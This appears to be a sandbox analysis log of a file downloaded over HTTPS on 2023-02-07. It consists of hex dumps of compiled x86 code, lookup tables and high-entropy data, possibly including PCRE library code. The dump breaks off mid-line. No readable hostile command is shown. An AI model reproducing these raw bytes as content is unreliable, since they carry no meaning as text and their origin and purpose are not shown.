2023-02-07 17:26:32 UTC	8	IN	Data Raw: ff ff eb 13 b8 fc ff ff ff eb 0c 90 e9 1b fc ff ff 90 e9 15 fc ff ff 83 c4 40 5b 5e 5d c3 55 89 e5 53 83 ec 10 8b 45 08 0f b6 18 84 db 75 0a b8 00 00 00 00 e9 6e 01 00 00 80 fb 70 75 24 8b 45 08 83 c0 01 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8b 45 08 83 c0 02 0f b6 00 0f b6 c0 09 d0 01 45 08 eb c3 80 fb 7c 75 20 83 7d 10 00 79 08 8b 45 08 e9 32 01 00 00 0f b6 c3 0f b6 80 a0 81 37 69 0f b6 c0 01 45 08 eb 9e 80 fb 85 74 0f 80 fb 8a 74 0a 80 fb 86 74 05 80 fb 8b 75 47 8b 45 08 83 c0 03 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8b 45 08 83 c0 04 0f b6 00 0f b6 c0 09 d0 89 45 f8 8b 45 f8 3b 45 10 75 08 8b 45 08 e9 da 00 00 00 0f b6 c3 0f b6 80 a0 81 37 69 0f b6 c0 01 45 08 e9 c0 00 00 00 0f b6 c3 83 e8 55 83 f8 46 77 5e 8b 04 85 dc 58 37 69 ff e0 8b 45 08 83 c0 01 0f b6 00 Data Ascii: @[^]USEunpu$EEE\|u }yE27iEtttuGEEEE;EuE7iEUFw^X7iE
2023-02-07 17:26:32 UTC	16	IN	Data Raw: 00 83 f8 01 0f 87 29 01 00 00 b8 00 00 00 00 e9 62 01 00 00 8b 45 e8 8b 00 83 f8 0f 0f 94 c0 0f b6 c8 8b 45 e8 83 c0 0c 8b 10 8b 45 e8 83 c0 08 8b 00 89 4c 24 0c 89 54 24 08 89 44 24 04 8b 45 a4 89 04 24 e8 7a e8 ff ff 85 c0 0f 85 e5 00 00 00 b8 00 00 00 00 e9 1b 01 00 00 81 7d a4 ff 00 00 00 76 0a b8 00 00 00 00 e9 08 01 00 00 81 7d a4 ff 00 00 00 0f 87 be 00 00 00 8d 45 80 39 45 e8 75 05 8b 45 08 eb 03 8b 45 18 8b 55 e8 83 c2 08 8b 12 f7 da 01 d0 89 45 a0 8b 45 a4 c1 e8 03 89 c2 8b 45 a0 01 d0 0f b6 00 0f b6 d0 8b 45 a4 83 e0 07 89 c1 d3 ea 89 d0 83 e0 01 85 c0 74 7c b8 00 00 00 00 e9 ac 00 00 00 8d 45 80 39 45 e8 75 05 8b 45 08 eb 03 8b 45 18 8b 55 e8 83 c2 08 8b 12 b9 02 00 00 00 29 d1 89 ca 01 c2 8b 45 0c 89 44 24 08 89 54 24 04 8b 45 a4 89 04 24 e8 Data Ascii: )bEEEL$T$D$E$z}v}E9EuEEUEEEEt\|E9EuEEU)ED$T$E$
2023-02-07 17:26:32 UTC	32	IN	Data Raw: 2c ff ff ff 8b 85 80 fe ff ff 01 c3 83 ee 01 85 f6 0f 89 36 fe ff ff e9 bc 00 00 00 89 d8 2b 85 28 ff ff ff 83 c0 01 89 85 64 fe ff ff 8b 85 64 fe ff ff f7 d8 01 d8 89 85 60 fe ff ff 8b 85 60 fe ff ff 83 c0 01 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8b 85 60 fe ff ff 83 c0 02 0f b6 00 0f b6 c0 09 d0 89 85 5c fe ff ff 83 bd 5c fe ff ff 00 74 14 8b 85 5c fe ff ff f7 d8 89 c2 8b 85 28 ff ff ff 01 d0 eb 05 b8 00 00 00 00 89 85 28 ff ff ff 89 d8 8d 58 01 c6 00 78 8b 85 64 fe ff ff c1 f8 08 88 03 8d 43 01 8b 95 64 fe ff ff 88 10 83 c3 02 8b 85 64 fe ff ff c1 f8 08 89 c2 8b 85 60 fe ff ff 83 c0 01 88 10 8b 85 60 fe ff ff 83 c0 02 8b 95 64 fe ff ff 88 10 83 bd 28 ff ff ff 00 0f 85 37 ff ff ff e9 f8 02 00 00 8d 43 fd 89 85 58 fe ff ff 8b 85 58 fe ff ff 83 c0 01 0f b6 00 Data Ascii: ,6+(dd```\\t\((XxdCdd``d(7CXX
2023-02-07 17:26:32 UTC	48	IN	Data Raw: 8b 40 2c 89 45 f0 c7 45 f4 00 00 00 00 e9 8b 00 00 00 8b 45 10 8b 55 f0 83 c2 02 89 44 24 08 89 54 24 04 8b 45 0c 89 04 24 e8 a2 60 02 00 89 45 ec 83 7d ec 00 75 1b 8b 45 10 83 c0 02 89 c2 8b 45 f0 01 d0 0f b6 00 84 c0 74 07 c7 45 ec ff ff ff ff 83 7d ec 00 79 38 8b 45 08 8b 40 30 2b 45 f4 89 c2 8b 45 08 8b 40 34 0f af c2 89 c1 8b 45 08 8b 40 34 89 c2 8b 45 f0 01 c2 89 4c 24 08 8b 45 f0 89 44 24 04 89 14 24 e8 32 60 02 00 eb 1c 8b 45 08 8b 40 34 01 45 f0 83 45 f4 01 8b 45 08 8b 40 30 39 45 f4 0f 8c 66 ff ff ff 8b 45 14 c1 e8 08 89 c2 8b 45 f0 88 10 8b 45 f0 83 c0 01 8b 55 14 88 10 8b 45 10 8b 55 f0 83 c2 02 89 44 24 08 8b 45 0c 89 44 24 04 89 14 24 e8 e8 5f 02 00 8b 45 10 83 c0 02 89 c2 8b 45 f0 01 d0 c6 00 00 8b 45 08 8b 40 30 8d 50 01 8b 45 08 89 50 30 Data Ascii: @,EEEUD$T$E$`E}uEEtE}y8E@0+EE@4E@4EL$ED$$2`E@4EEE@09EfEEEUEUD$ED$$_EEE@0PEP0
2023-02-07 17:26:32 UTC	64	IN	Data Raw: c2 8b 45 98 83 c0 02 0f b6 00 0f b6 c0 09 d0 39 45 88 7c 36 8b 45 d8 8d 50 01 89 55 d8 39 45 24 7e 1e 8b 45 94 8d 50 04 8b 45 e8 89 10 8b 45 e8 c7 40 04 00 00 00 00 83 45 e8 0c e9 da 4c 00 00 b8 ed ff ff ff e9 c1 4d 00 00 8b 45 d8 8d 50 01 89 55 d8 39 45 24 7e 1a 8b 45 e8 8b 55 94 89 10 8b 45 e8 8b 55 88 89 50 04 83 45 e8 0c e9 a8 4c 00 00 b8 ed ff ff ff e9 8f 4d 00 00 8b 45 dc 8d 50 01 89 55 dc 39 45 24 7e 31 8b 45 94 8d 50 04 8b 45 ec 89 10 8b 45 ec c7 40 04 00 00 00 00 83 45 ec 0c 8b 85 74 fe ff ff 8b 40 04 89 45 88 83 7d b8 00 0f 8e 64 4c 00 00 eb 0a b8 ed ff ff ff e9 46 4d 00 00 83 7d ac 0c 75 55 8b 45 e4 8d 50 01 8b 45 08 8b 40 08 39 c2 72 45 8b 45 08 8b 40 18 25 00 00 00 08 85 c0 74 36 8b 45 08 8b 40 20 85 c0 75 2c 8b 45 08 8b 40 24 83 f8 02 75 21 Data Ascii: E9E\|6EPU9E$~EPEE@ELMEPU9E$~EUEUPELMEPU9E$~1EPEE@Et@E}dLFM}uUEPE@9rEE@%t6E@ u,E@$u!
2023-02-07 17:26:32 UTC	80	IN	Data Raw: 00 00 00 74 0c 81 bd 38 fe ff ff 90 00 00 00 75 0a b8 ef ff ff ff e9 f0 0d 00 00 81 bd 38 fe ff ff 91 00 00 00 74 0c 81 bd 38 fe ff ff 9d 00 00 00 75 3f 8b 45 dc 8d 50 01 89 55 dc 39 45 24 7e 27 8b 55 94 8b 85 3c fe ff ff 01 d0 8d 50 03 8b 45 ec 89 10 8b 45 ec c7 40 04 00 00 00 00 83 45 ec 0c 90 e9 19 0d 00 00 b8 ed ff ff ff e9 99 0d 00 00 81 bd 38 fe ff ff 8f 00 00 00 0f 85 b9 00 00 00 8b 45 98 83 c0 04 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8b 45 98 83 c0 05 0f b6 00 0f b6 c0 09 d0 89 85 34 fe ff ff 81 bd 34 fe ff ff ff ff 00 00 74 0a b8 ef ff ff ff e9 4e 0d 00 00 8b 45 08 8b 40 30 85 c0 74 36 8b 45 dc 8d 50 01 89 55 dc 39 45 24 7e 1e 8b 45 94 8d 50 06 8b 45 ec 89 10 8b 45 ec c7 40 04 00 00 00 00 83 45 ec 0c e9 8e 0c 00 00 b8 ed ff ff ff e9 0e 0d 00 00 8b 45 Data Ascii: t8u8t8u?EPU9E$~'U<PEE@E8EE44tNE@0t6EPU9E$~EPEE@EE
2023-02-07 17:26:32 UTC	96	IN	Data Raw: 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 89 54 24 04 89 34 24 e8 d7 e0 ff ff 89 c3 8b 85 10 fe ff ff 8d 0c 85 00 00 00 00 8b 95 0c fe ff ff 8b 45 18 8b 40 0c 89 4c 24 08 89 54 24 04 89 04 24 e8 7c a0 01 00 8b 95 14 fe ff ff 8b 45 18 89 90 90 00 00 00 8b 95 04 fe ff ff 8b 45 18 89 90 a4 00 00 00 83 fb 01 74 08 81 fb 19 fc ff ff 75 38 8b 95 0c fe ff ff 8d 85 84 fd ff ff 39 c2 74 10 a1 c8 30 37 69 8b 95 0c fe ff ff 89 14 24 ff d0 8b 45 18 8b b0 80 00 00 00 8b 45 18 8b 40 7c 89 45 10 90 e9 74 3a 01 00 81 fb 1c fc ff ff 7c 32 81 fb 21 fc ff ff 7d 2a 8b 95 0c fe ff ff 8d 85 84 fd ff ff 39 c2 74 10 a1 c8 30 37 69 8b 95 0c fe ff ff 89 14 24 ff d0 b8 00 00 00 00 e9 3f 3a 01 00 85 db 74 27 8b 95 0c fe ff ff 8d 85 84 fd ff ff 39 c2 74 10 a1 c8 Data Ascii: ED$ED$ED$T$4$E@L$T$$\|EEtu89t07i$EE@\|Et:\|2!}*9t07i$?:t'9t
2023-02-07 17:26:32 UTC	112	IN	Data Raw: 18 c7 40 64 01 00 00 00 8b 45 18 8b 80 88 00 00 00 83 f8 01 7e 2a b8 f4 ff ff ff e9 08 fb 00 00 8b 85 80 fe ff ff 01 c6 83 85 44 fd ff ff 01 8b 85 44 fd ff ff 3b 45 a8 0f 8c 64 ff ff ff eb 4c 90 eb 49 8b 45 20 83 c0 01 89 44 24 18 8b 45 1c 89 44 24 14 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 89 34 24 e8 80 a0 ff ff 89 c3 85 db 74 07 89 d8 e9 a3 fa 00 00 8b 45 ac f7 d8 01 c6 3b b5 84 fe ff ff 73 af b8 00 00 00 00 e9 8a fa 00 00 8b 45 0c 83 c0 01 89 85 c4 fe ff ff 83 45 0c 21 8b 45 0c 0f b6 00 0f b6 c0 83 e8 62 83 f8 0b 0f 87 e4 00 00 00 8b 04 85 f0 77 37 69 ff e0 8b 45 0c 8d 48 01 89 4d 0c 0f b6 00 0f b6 c0 83 e8 62 89 c7 83 ff 07 77 12 89 f8 83 e0 01 85 c0 0f 95 c0 0f b6 c0 89 45 e4 eb 07 c7 45 e0 01 00 00 00 0f Data Ascii: @dE~*DD;EdLIE D$ED$ED$ED$ED$ED$4$tE;sEE!Ebw7iEHMbwEE
2023-02-07 17:26:32 UTC	128	IN	Data Raw: c3 83 c6 02 e9 18 01 00 00 89 d8 83 e0 08 85 c0 75 47 89 d8 c1 e0 12 25 00 00 1c 00 89 c2 0f b6 06 0f b6 c0 c1 e0 0c 25 00 f0 03 00 09 c2 8d 46 01 0f b6 00 0f b6 c0 c1 e0 06 25 c0 0f 00 00 09 c2 8d 46 02 0f b6 00 0f b6 c0 83 e0 3f 89 d3 09 c3 83 c6 03 e9 c8 00 00 00 89 d8 83 e0 04 85 c0 75 57 89 d8 c1 e0 18 25 00 00 00 03 89 c2 0f b6 06 0f b6 c0 c1 e0 12 25 00 00 fc 00 09 c2 8d 46 01 0f b6 00 0f b6 c0 c1 e0 0c 25 00 f0 03 00 09 c2 8d 46 02 0f b6 00 0f b6 c0 c1 e0 06 25 c0 0f 00 00 09 c2 8d 46 03 0f b6 00 0f b6 c0 83 e0 3f 89 d3 09 c3 83 c6 04 eb 68 89 d8 c1 e0 1e 25 00 00 00 40 89 c2 0f b6 06 0f b6 c0 c1 e0 18 25 00 00 00 3f 09 c2 8d 46 01 0f b6 00 0f b6 c0 c1 e0 12 25 00 00 fc 00 09 c2 8d 46 02 0f b6 00 0f b6 c0 c1 e0 0c 25 00 f0 03 00 09 c2 8d 46 03 0f Data Ascii: uG%%F%F?uW%%F%F%F?h%@%?F%F%F
2023-02-07 17:26:32 UTC	144	IN	Data Raw: 44 fd ff ff 01 00 00 00 eb 7e 8b 45 18 8b 40 78 39 c6 72 46 8b 45 18 8b 80 88 00 00 00 85 c0 74 2f 8b 45 18 8b 80 84 00 00 00 39 c6 76 22 8b 45 18 c7 40 64 01 00 00 00 8b 45 18 8b 80 88 00 00 00 83 f8 01 7e 0a b8 f4 ff ff ff e9 d8 7a 00 00 b8 00 00 00 00 e9 ce 7a 00 00 89 f0 8d 70 01 0f b6 00 0f b6 c0 83 f8 0a 7c 0c 83 f8 0d 7e 11 3d 85 00 00 00 74 0a b8 00 00 00 00 e9 a8 7a 00 00 90 83 85 44 fd ff ff 01 8b 85 44 fd ff ff 3b 45 a4 0f 8e 73 ff ff ff e9 c2 03 00 00 c7 85 44 fd ff ff 01 00 00 00 eb 7f 8b 45 18 8b 40 78 39 c6 72 46 8b 45 18 8b 80 88 00 00 00 85 c0 74 2f 8b 45 18 8b 80 84 00 00 00 39 c6 76 22 8b 45 18 c7 40 64 01 00 00 00 8b 45 18 8b 80 88 00 00 00 83 f8 01 7e 0a b8 f4 ff ff ff e9 3a 7a 00 00 b8 00 00 00 00 e9 30 7a 00 00 8b 45 18 8b 50 40 0f Data Ascii: D~E@x9rFEt/E9v"E@dE~zzp\|~=tzDD;EsDE@x9rFEt/E9v"E@dE~:z0zEP@
2023-02-07 17:26:32 UTC	160	IN	Data Raw: 25 00 f0 03 00 09 c2 8d 46 04 0f b6 00 0f b6 c0 c1 e0 06 25 c0 0f 00 00 09 c2 8d 46 05 0f b6 00 0f b6 c0 83 e0 3f 89 d7 09 c7 83 85 20 ff ff ff 05 89 f8 8d 50 7f 85 c0 0f 48 c2 c1 f8 07 0f b6 80 20 a5 37 69 0f b6 c0 c1 e0 07 89 c3 89 fa 89 d0 c1 f8 1f c1 e8 19 89 c1 8d 04 0a 83 e0 7f 29 c8 01 d8 0f b7 84 00 20 c7 37 69 0f b7 c0 c1 e0 03 05 a0 8e 37 69 0f b6 40 01 0f b6 c0 8b 04 85 80 83 37 69 89 85 28 fe ff ff 83 bd 28 fe ff ff 01 74 09 83 bd 28 fe ff ff 03 75 07 b8 01 00 00 00 eb 05 b8 00 00 00 00 3b 45 b8 74 29 8b 85 20 ff ff ff 01 c6 83 85 44 fd ff ff 01 8b 85 44 fd ff ff 3b 45 a8 0f 8c 4d fd ff ff e9 3d 0b 00 00 90 e9 37 0b 00 00 90 e9 31 0b 00 00 8b 45 a4 89 85 44 fd ff ff e9 0a 03 00 00 c7 85 1c ff ff ff 01 00 00 00 8b 45 18 8b 40 78 39 c6 72 48 8b Data Ascii: %F%F? PH 7i) 7i7i@7i((t(u;Et) DD;EM=71EDE@x9rH
2023-02-07 17:26:33 UTC	176	IN	Data Raw: 1c 25 00 01 00 00 85 c0 0f 95 c0 0f b6 d0 8b 45 ac 89 50 48 8b 45 1c 25 00 04 00 00 85 c0 0f 95 c0 0f b6 d0 8b 45 ac 89 50 5c 8b 45 1c 25 00 00 00 10 85 c0 0f 95 c0 0f b6 d0 8b 45 ac 89 50 60 8b 45 ac c7 40 64 00 00 00 00 8b 45 ac c7 80 b0 00 00 00 00 00 00 00 8b 45 ac 8b 90 b0 00 00 00 8b 45 ac 89 90 ac 00 00 00 8b 45 ac c7 80 a4 00 00 00 00 00 00 00 8b 45 a8 8b 40 0c 25 00 10 00 00 85 c0 0f 95 c0 0f b6 d0 8b 45 ac 89 50 6c 8b 45 ac 8b 55 d8 89 50 38 8b 45 d8 8d 90 00 01 00 00 8b 45 ac 89 50 3c 8b 45 d8 8d 90 40 03 00 00 8b 45 ac 89 50 40 8b 45 1c 25 00 00 80 01 3d 00 00 80 00 74 41 3d 00 00 00 01 74 46 85 c0 75 4e 8b 45 a8 8b 40 08 25 00 00 80 01 85 c0 74 1b 8b 45 a8 8b 40 08 25 00 00 80 00 85 c0 0f 95 c0 0f b6 d0 8b 45 ac 89 50 68 eb 2e 8b 45 ac c7 40 Data Ascii: %EPHE%EP\E%EP`E@dEEEEE@%EPlEUP8EEP<E@EP@E%=tA=tFuNE@%tE@%EPh.E@
2023-02-07 17:26:33 UTC	192	IN	Data Raw: 00 00 00 00 00 83 7d ec 00 74 0c 8b 45 ec 8b 00 3d 45 52 43 50 74 13 8b 45 10 c7 00 ac 80 37 69 b8 00 00 00 00 e9 de 02 00 00 8b 45 ec 8b 40 0c 83 e0 01 85 c0 75 13 8b 45 10 c7 00 dc 80 37 69 b8 00 00 00 00 e9 be 02 00 00 8b 45 0c 83 e0 f0 85 c0 74 13 8b 45 10 c7 00 00 81 37 69 b8 00 00 00 00 e9 a1 02 00 00 8b 45 ec 0f b7 40 22 0f b7 d0 8b 45 ec 0f b7 40 26 0f b7 c8 8b 45 ec 0f b7 40 24 0f b7 c0 0f af c1 01 c2 8b 45 ec 01 d0 89 45 e8 8b 45 ec 8b 40 08 83 e0 10 85 c0 0f 85 ef 00 00 00 8b 45 ec 8b 40 0c 25 10 01 00 00 85 c0 0f 85 dc 00 00 00 8b 45 ec 8b 40 30 89 45 b4 8b 45 b4 85 c0 75 22 8d 45 b4 89 44 24 0c c7 44 24 08 0b 00 00 00 c7 44 24 04 00 00 00 00 8b 45 08 89 04 24 e8 88 ce ff ff 8b 45 b4 89 85 24 ff ff ff 8b 45 b4 05 00 01 00 00 89 85 28 ff ff ff Data Ascii: }tE=ERCPtE7iE@uE7iEtE7iE@"E@&E@$EEE@E@%E@0EEu"ED$D$D$E$E$E(
2023-02-07 17:26:33 UTC	208	IN	Data Raw: 6d 2d 34 69 6d 2d 34 69 6d 2d 34 69 6d 2d 34 69 8d 2d 34 69 8d 2d 34 69 8d 2d 34 69 6d 2d 34 69 6d 2d 34 69 6d 2d 34 69 8d 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 c2 2d 34 69 ad 2d 34 69 c2 2d 34 Data Ascii: m-4im-4im-4im-4i-4i-4i-4im-4im-4im-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4i-4
2023-02-07 17:26:33 UTC	224	IN	Data Raw: 27 0a 05 00 00 00 00 00 27 0d 0c 00 00 00 00 00 27 0f 0c 00 00 00 00 00 27 1a 0c 00 00 00 00 00 1f 1a 0c 00 00 00 00 00 05 07 0c 00 00 00 00 00 05 0c 03 00 00 00 00 00 05 0a 05 00 00 00 00 00 05 15 0c 00 00 00 00 00 5a 07 0c 00 00 00 00 00 5a 0a 05 00 00 00 00 00 5a 0c 03 00 00 00 00 00 5a 0a 0c 00 00 00 00 00 5a 0d 0c 00 00 00 00 00 5a 15 0c 00 00 00 00 00 5a 06 0c 00 00 00 00 00 1b 0b 03 00 00 00 00 00 3d 0c 03 00 00 00 00 00 3d 0a 05 00 00 00 00 00 3d 07 0c 00 00 00 00 00 3d 0d 0c 00 00 00 00 00 3d 15 0c 00 00 00 00 00 3d 1a 0c 00 00 00 00 00 4b 0c 03 00 00 00 00 00 4b 0a 05 00 00 00 00 00 4b 07 0c 00 00 00 00 00 4b 0d 0c 00 00 00 00 00 5c 07 0c 00 00 00 00 00 5c 0c 03 00 00 00 00 00 5c 0a 05 00 00 00 00 00 5c 15 0c 00 00 00 00 00 45 07 0c 00 00 00 00 Data Ascii: ''''ZZZZZZZ======KKKK\\\\E
2023-02-07 17:26:33 UTC	240	IN	Data Raw: e1 00 e2 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 e3 00 e4 00 e5 00 e5 00 72 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 72 00 72 00 e3 00 e3 00 72 00 72 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 72 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 e3 00 72 00 e3 00 72 00 72 00 72 00 e3 00 e3 00 e3 00 e3 00 72 00 72 00 e4 00 e3 00 e6 00 e5 00 e5 00 e4 00 e4 00 e4 00 e4 00 72 00 72 00 e5 00 e5 00 72 00 72 00 e5 00 e5 00 e4 00 e3 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 e6 00 72 00 72 00 72 00 72 00 e3 00 e3 00 72 00 e3 00 e3 00 e3 00 e4 00 e4 00 72 00 72 00 e7 00 e7 00 e7 00 e7 00 e7 00 e7 00 e7 00 e7 00 e7 00 e7 Data Ascii: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
2023-02-07 17:26:33 UTC	256	IN	Data Raw: d6 01 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 d7 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 3d 01 72 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 00 b1 Data Ascii: rrrrrrrrrrrrrr=======================rrrrrrrrr=======r=======r=======r=======r=======r=======r=======r=======r
2023-02-07 17:26:33 UTC	272	IN	Data Raw: 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 45 02 45 02 45 02 45 02 45 02 45 02 45 02 45 02 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEErrrrrrrrrEEEEEEEEEEEEEEEEEEEEEErrrrrrrrrrEEEEEEEErrrrrrrr
2023-02-07 17:26:33 UTC	288	IN	Data Raw: 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 72 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 72 00 72 00 72 00 72 00 72 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 Data Ascii: rrrrrr
2023-02-07 17:26:33 UTC	304	IN	Data Raw: 00 00 23 c3 e1 fe f5 74 e0 89 45 e8 0c 80 fb c1 e8 02 3a c0 f3 6f 43 40 89 45 fc e9 82 c7 03 00 eb 4e bb ff 78 c4 03 23 c3 89 45 e8 6c 47 b8 ff ff 00 00 23 44 04 eb 06 3a db 74 cd 04 3d 00 74 12 8b 45 f8 46 2d 04 eb d9 03 c3 89 c2 39 ea d2 01 00 00 8b c2 3d ea 40 03 00 00 e9 da c7 03 00 c9 c3 bb 01 87 c5 03 23 c3 75 05 8b c2 3d e8 be 8b 45 f8 bb f8 c5 03 00 23 c3 eb c0 3c c6 03 00 00 23 c3 75 91 4e 46 f8 e9 98 02 00 87 85 8a 45 fc e9 8f 01 87 c5 88 45 f8 eb c7 8b c2 3d b8 02 00 00 00 23 44 b0 ec e9 4e ff ff ff 40 80 bb 01 00 00 00 83 c2 7d 03 bb 00 00 00 00 bd 0c 77 22 83 45 98 00 3c c5 03 00 00 21 5d 9c e1 fe fc 74 5a 83 45 c8 86 7e 03 00 00 00 21 5d 4b 2c d8 01 00 00 21 5d 3b 02 46 c0 02 00 00 00 04 80 c3 00 3a f6 74 5e 3c c5 03 00 00 21 5d ac 40 80 b3 Data Ascii: #tE:oC@ENx#ElG#D:t=tEF-9=@#u=E#<#uNFEE=#DN@}w"E<!]tZE~!]K,!];F:t^<!]@
2023-02-07 17:26:33 UTC	320	IN	Data Raw: b2 d9 db 3c 2a 6f 6d db 29 9d 9c a9 32 2c 9d ac 0a 7d 65 61 d2 4a ec e3 b7 ff a0 57 03 a5 42 48 fb a4 9c 3f 2d c5 34 6e c7 0e 0e 38 55 4d c3 27 a0 45 24 f6 86 8c 94 7e 0e 04 3a 7a 83 09 83 67 fe e1 2b 0f 46 19 99 3b 94 53 94 d1 10 be 6d a2 d2 49 6f 0e ae ee e4 73 fa ed 94 f5 01 0f 12 3f 81 3d 2b 33 3b 21 ae d5 fb ac b0 dd d1 43 fa 04 7c 62 61 af fb bd c1 54 9c 34 53 2b 93 ae d3 d6 83 79 3c cd 8d 86 f4 a0 df 1b 0a 4a 51 e3 70 1c 8a 7f 6b a3 03 83 79 0e aa cb b5 dd ed fb ef a0 8d 21 dc 98 ba 64 5c 4a 6e b4 b1 6f e8 ed 62 36 72 a6 c3 7b be 9b 4b 26 42 83 30 de 7b 5d dc d8 a5 ab 20 95 3e 92 89 32 28 9f df 90 8a af b6 e5 31 96 44 f3 32 ce dd 13 12 38 d5 91 6a fb 89 3d b4 b5 aa 39 7c 0c de 43 e7 68 02 be c9 76 c6 96 b9 43 b4 94 19 05 ed 1d a8 94 44 19 78 3d 19 Data Ascii: <*om)2,}eaJWBH?-4n8UM'E$~:zg+F;SmIos?=+3;!C\|baT4S+y<JQpky!d\Jnob6r{K&B0{] >2(1D28j=9\|ChvCDx=
2023-02-07 17:26:33 UTC	336	IN	Data Raw: d3 d4 35 33 38 a7 ce 86 2f ce 88 6e d1 62 4a 1e a4 6f 89 8b 29 c0 b5 bb f5 cf c3 a8 dd 4c 11 3a ff f2 63 d3 3f d8 16 48 4a f9 ea 6c 4f 6f 29 d5 43 4d 35 c5 b3 ae 23 c1 52 4c c1 25 92 1f f3 d5 19 9c 94 4e 98 8b 7f ed e0 e2 e2 31 48 d9 b4 66 87 06 8b 8e 19 82 79 b1 f2 ef de da 01 50 d7 81 0f ff bf 48 f0 fb f8 32 bb a7 5a 23 50 4f 45 da 24 22 e7 1b 35 09 3f 72 4f 6a 7f 36 fa ea e1 9d ab db cb 83 63 52 9e 7d c4 ac 42 fd bb 2e fc 34 5a 10 07 b4 f5 6c de 7e 4c 5a cf 80 e4 bb f2 f0 be 54 53 07 6e 8b 46 f3 79 ee 8a 9b b7 38 37 e5 99 88 5c cc f6 6f 07 02 a4 7b ee 3f 6c 9f 1a 99 a2 fa 26 f3 28 09 01 44 